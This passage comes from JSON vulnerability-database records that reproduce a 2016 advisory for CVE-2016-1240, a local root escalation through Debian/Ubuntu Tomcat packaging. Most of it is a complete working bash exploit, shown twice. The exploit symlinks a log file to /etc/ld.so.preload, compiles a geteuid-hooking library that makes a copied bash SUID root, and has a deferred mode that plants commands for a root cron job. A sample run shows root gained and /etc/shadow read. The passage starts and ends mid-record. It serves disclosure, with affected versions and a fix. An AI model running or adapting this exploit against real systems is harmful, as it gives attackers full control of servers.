\"\\n[+] Active exploitation aborted. 
Remember you can use -deferred switch for deferred exploitation.\"\r\ncleanexit 0\r\n}\r\n\r\n#intro\r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\nexit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\nmode=\"deferred\"\r\nelse\r\nmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\nexit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\necho -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\nexit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\nrm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\ncleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\necho -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\necho -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . 
After the Tomcat restart / system reboot\"\r\necho -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\necho -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\nexit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\nstatic uid_t (*old_geteuid)();\r\nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\nif ( old_geteuid() == 0 ) {\r\nchown(\"$BACKDOORPATH\", 0, 0);\r\nchmod(\"$BACKDOORPATH\", 04777);\r\nunlink(\"/etc/ld.so.preload\");\r\n}\r\nreturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\ncleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\ncleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\ncleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do\r\nsleep 0.1\r\nif [ -f /etc/ld.so.preload ]; then\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\nbreak;\r\nfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then\r\necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\necho -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\necho -e \"\\n[!] Failed to get root\"\r\ncleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n\r\n[email\u00a0protected]:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[email\u00a0protected]:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID: Ubuntu\r\nDescription: Ubuntu 16.04 LTS\r\nRelease: 16.04\r\nCodename: xenial\r\n\r\n[email\u00a0protected]:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\n[email\u00a0protected]:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out\r\n\r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by:\r\n\r\nDawid Golunski\r\nhttp://legalhackers.com\r\n\r\n[+] Starting the exploit in [active] mode with the following privileges:\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at:\r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at:\r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. 
The /etc/ld.so.preload file got created with tomcat privileges:\r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains:\r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at:\r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;)\r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now!\r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to the tomcat user account (for example\r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n\r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nMore detailed lists of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systems that use Tomcat packages provided by Debian may also be affected.\r\n\r\n\r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n\r\nIX. 
REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25101"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:19", "bulletinFamily": "exploit", "description": "", "modified": "2016-10-02T00:00:00", "published": "2016-10-02T00:00:00", "href": "https://packetstormsecurity.com/files/138940/Apache-Tomcat-8.0.36-2-Privilege-Escalation.html", "id": "PACKETSTORM:138940", "title": "Apache Tomcat 8.0.36-2 Privilege Escalation", "type": "packetstorm", "sourceData": "`============================================= \n- Discovered by: Dawid Golunski \n- http://legalhackers.com \n- dawid (at) legalhackers.com \n \n- CVE-2016-1240 \n- Release date: 30.09.2016 \n- Revision: 1 \n- Severity: High \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nApache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation \n \nAffected debian packages: \n \nTomcat 8 <= 8.0.36-2 \nTomcat 7 <= 7.0.70-2 \nTomcat 6 <= 6.0.45+dfsg-1~deb8u1 \n \nUbuntu systems are also affected. See section VII. for details. \nOther systems using the affected debian packages may also be affected. \n \n \nII. BACKGROUND \n------------------------- \n \n\"The Apache Tomcat\u00ae software is an open source implementation of the \nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language \nand Java WebSocket specifications are developed under the Java Community \nProcess. \n \nThe Apache Tomcat software is developed in an open and participatory \nenvironment and released under the Apache License version 2. \nThe Apache Tomcat project is intended to be a collaboration of the \nbest-of-breed developers from around the world. 
\n \nApache Tomcat software powers numerous large-scale, mission-critical web \napplications across a diverse range of industries and organizations. \nSome of these users and their stories are listed on the PoweredBy wiki page. \n\" \n \nhttp://tomcat.apache.org/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \ndistributions (including Debian, Ubuntu etc.) provide a vulnerable \ntomcat init script that allows local attackers who have already gained access \nto the tomcat account (for example, by exploiting an RCE vulnerability \nin a java web application hosted on Tomcat, uploading a webshell etc.) to \nescalate their privileges from tomcat user to root and fully compromise the \ntarget system. \n \nIV. DESCRIPTION \n------------------------- \n \nThe vulnerability is located in the tomcat init script provided by affected \npackages, normally installed at /etc/init.d/tomcatN. \n \nThe script for tomcat7 contains the following lines: \n \n-----[tomcat7]---- \n \n# Run the catalina.sh script as a daemon \nset +e \ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \n \n-------[eof]------ \n \nLocal attackers who have gained access to the server in the context of the \ntomcat user (for example, through a vulnerability in a web application) would \nbe able to replace the log file with a symlink to an arbitrary system file \nand escalate their privileges to root once Tomcat init script (running as root) \nre-opens the catalina.out file after a service restart, reboot etc. \n \nAs attackers would already have a tomcat account at the time of exploitation, \nthey could also kill the tomcat processes to introduce the need for a restart. \n \n \nV. 
PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n------[ tomcat-rootprivesc-deb.sh ]------ \n \n#!/bin/bash \n# \n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \n# \n# CVE-2016-1240 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# http://legalhackers.com \n# \n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \n# Debian-based distros including Debian, Ubuntu etc. \n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \n# vulnerable java webapp, or locally via weak permissions on webapps in the \n# Tomcat webroot directories etc.) to escalate their privileges to root. \n# \n# Usage: \n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] \n# \n# The exploit can be used in two ways: \n# \n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly \n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up \n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) \n# \n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can \n# then add arbitrary commands to the file which will be executed with root privileges by \n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \n# Ubuntu/Debian Tomcat installations). \n# \n# See full advisory for details at: \n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. 
\n# \n \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/tomcatrootsh\" \nPRIVESCLIB=\"/tmp/privesclib.so\" \nPRIVESCSRC=\"/tmp/privesclib.c\" \nSUIDBIN=\"/usr/bin/sudo\" \n \nfunction cleanexit { \n# Cleanup \necho -e \"\\n[+] Cleaning up...\" \nrm -f $PRIVESCSRC \nrm -f $PRIVESCLIB \nrm -f $TOMCATLOG \ntouch $TOMCATLOG \nif [ -f /etc/ld.so.preload ]; then \necho -n > /etc/ld.so.preload 2>/dev/null \nfi \necho -e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \n \nfunction ctrl_c() { \necho -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n \n#intro \necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\" \necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\" \n \n# Args \nif [ $# -lt 1 ]; then \necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\" \nexit 3 \nfi \nif [ \"$2\" = \"-deferred\" ]; then \nmode=\"deferred\" \nelse \nmode=\"active\" \nfi \n \n# Priv check \necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\" \nid | grep -q tomcat \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\" \nexit 3 \nfi \n \n# Set target paths \nTOMCATLOG=\"$1\" \nif [ ! -f $TOMCATLOG ]; then \necho -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\" \nexit 3 \nfi \necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\" \n \n# [ Deferred exploitation ] \n \n# Symlink the log file to /etc/default/locale file which gets executed daily on default \n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. \n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been \n# restarted and file owner gets changed. 
\nif [ \"$mode\" = \"deferred\" ]; then \nrm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\" \necho -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\" \necho -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\" \necho -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\" \necho -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\" \nexit 0 \nfi \n \n# [ Active exploitation ] \n \ntrap ctrl_c INT \n# Compile privesc preload library \necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\" \ncat <<_solibeof_>$PRIVESCSRC \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <dlfcn.h> \nuid_t geteuid(void) { \nstatic uid_t (*old_geteuid)(); \nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\"); \nif ( old_geteuid() == 0 ) { \nchown(\"$BACKDOORPATH\", 0, 0); \nchmod(\"$BACKDOORPATH\", 04777); \nunlink(\"/etc/ld.so.preload\"); \n} \nreturn old_geteuid(); \n} \n_solibeof_ \ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\" \ncleanexit 2; \nfi \n \n# Prepare backdoor shell \ncp $BACKDOORSH $BACKDOORPATH \necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\" \n \n# Safety check \nif [ -f /etc/ld.so.preload ]; then \necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\" \ncleanexit 2 \nfi \n \n# Symlink the log file to ld.so.preload \nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\" \n \n# Wait for Tomcat to re-open the logs \necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\" \necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\" \nwhile :; do \nsleep 0.1 \nif [ -f /etc/ld.so.preload ]; then \necho $PRIVESCLIB > /etc/ld.so.preload \nbreak; \nfi \ndone \n \n# /etc/ld.so.preload file should be owned by tomcat user at this point \n# Inject the privesc.so shared library to escalate privileges \necho $PRIVESCLIB > /etc/ld.so.preload \necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\" \necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\" \necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\" \n \n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) \necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\" \nsudo --help 2>/dev/null >/dev/null \n \n# Check for the rootshell \nls -l $BACKDOORPATH | grep rws | grep -q root \nif [ $? -eq 0 ]; then \necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\" \necho -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\" \nelse \necho -e \"\\n[!] Failed to get root\" \ncleanexit 2 \nfi \n \n# Execute the rootshell \necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\" \n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\" \n$BACKDOORPATH -p \n \n# Job done. \ncleanexit 0 \n \n--------------[ EOF ]-------------------- \n \n \n \nExample exploit run: \n~~~~~~~~~~~~~ \n \ntomcat7@ubuntu:/tmp$ id \nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) \n \ntomcat7@ubuntu:/tmp$ lsb_release -a \nNo LSB modules are available. 
\nDistributor ID: Ubuntu \nDescription: Ubuntu 16.04 LTS \nRelease: 16.04 \nCodename: xenial \n \ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat \nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries \nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine \nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files \n \ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \n \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \nCVE-2016-1240 \n \nDiscovered and coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n[+] Starting the exploit in [active] mode with the following privileges: \nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) \n \n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out \n \n[+] Compiling the privesc shared library (/tmp/privesclib.c) \n \n[+] Backdoor/low-priv shell installed at: \n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh \n \n[+] Symlink created at: \nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload \n \n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart... \nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) \n \n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload \n \n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload \n \n[+] The /etc/ld.so.preload file now contains: \n/tmp/privesclib.so \n \n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! \n \n[+] Rootshell got assigned root SUID perms at: \n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh \n \nPlease tell me you're seeing this too ;) \n \n[+] Executing the rootshell /tmp/tomcatrootsh now! 
\n \ntomcatrootsh-4.3# id \nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) \ntomcatrootsh-4.3# whoami \nroot \ntomcatrootsh-4.3# head -n3 /etc/shadow \nroot:$6$oaf[cut]:16912:0:99999:7::: \ndaemon:*:16912:0:99999:7::: \nbin:*:16912:0:99999:7::: \ntomcatrootsh-4.3# exit \nexit \n \n[+] Cleaning up... \n \n[+] Job done. Exiting with code 0 \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nLocal attackers who have gained access to the tomcat user account (for example \nremotely via a vulnerable web application, or locally via weak webroot perms), \ncould escalate their privileges to root and fully compromise the affected system. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nThe following Debian package versions are affected: \n \nTomcat 8 <= 8.0.36-2 \nTomcat 7 <= 7.0.70-2 \nTomcat 6 <= 6.0.45+dfsg-1~deb8u1 \n \nA more detailed list of affected packages can be found at: \n \nDebian: \nhttps://security-tracker.debian.org/tracker/CVE-2016-1240 \n \nUbuntu: \nhttp://www.ubuntu.com/usn/usn-3081-1/ \n \nOther systems that use Tomcat packages provided by Debian may also be affected. \n \n \nVIII. SOLUTION \n------------------------- \n \nDebian Security Team was contacted and has fixed affected upstream packages. \nUpdate to the latest tomcat packages provided by your distribution. \n \nIX. 
REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n \nThe exploit's sourcecode \nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh \n \nCVE-2016-1240 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240 \n \nUbuntu Security Notice USN-3081-1: \nhttp://www.ubuntu.com/usn/usn-3081-1/ \n \nDebian Security Advisory DSA-3669-1 (tomcat7): \nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html \nhttps://www.debian.org/security/2016/dsa-3669 \n \nDebian Security Advisory DSA-3670-1 (tomcat8): \nhttps://www.debian.org/security/2016/dsa-3670 \n \nhttps://security-tracker.debian.org/tracker/CVE-2016-1240 \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nhttp://legalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n30.09.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138940/tomcat80362-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:03:53", "bulletinFamily": "exploit", "description": "I. VULNERABILITY\r\n-------------------------\r\n\r\nApache Tomcat\u00ae packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2 \r\nTomcat 7 <= 7.0.70-2 \r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. 
for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat software is an open source implementation of the \r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r\ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language \r\nand Java WebSocket specifications are developed under the Java Community \r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory \r\nenvironment and released under the Apache License version 2. \r\nThe Apache Tomcat project is intended to be a collaboration of the \r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web \r\napplications across a diverse range of industries and organizations. \r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access \r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the \r\ntarget system.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN. 
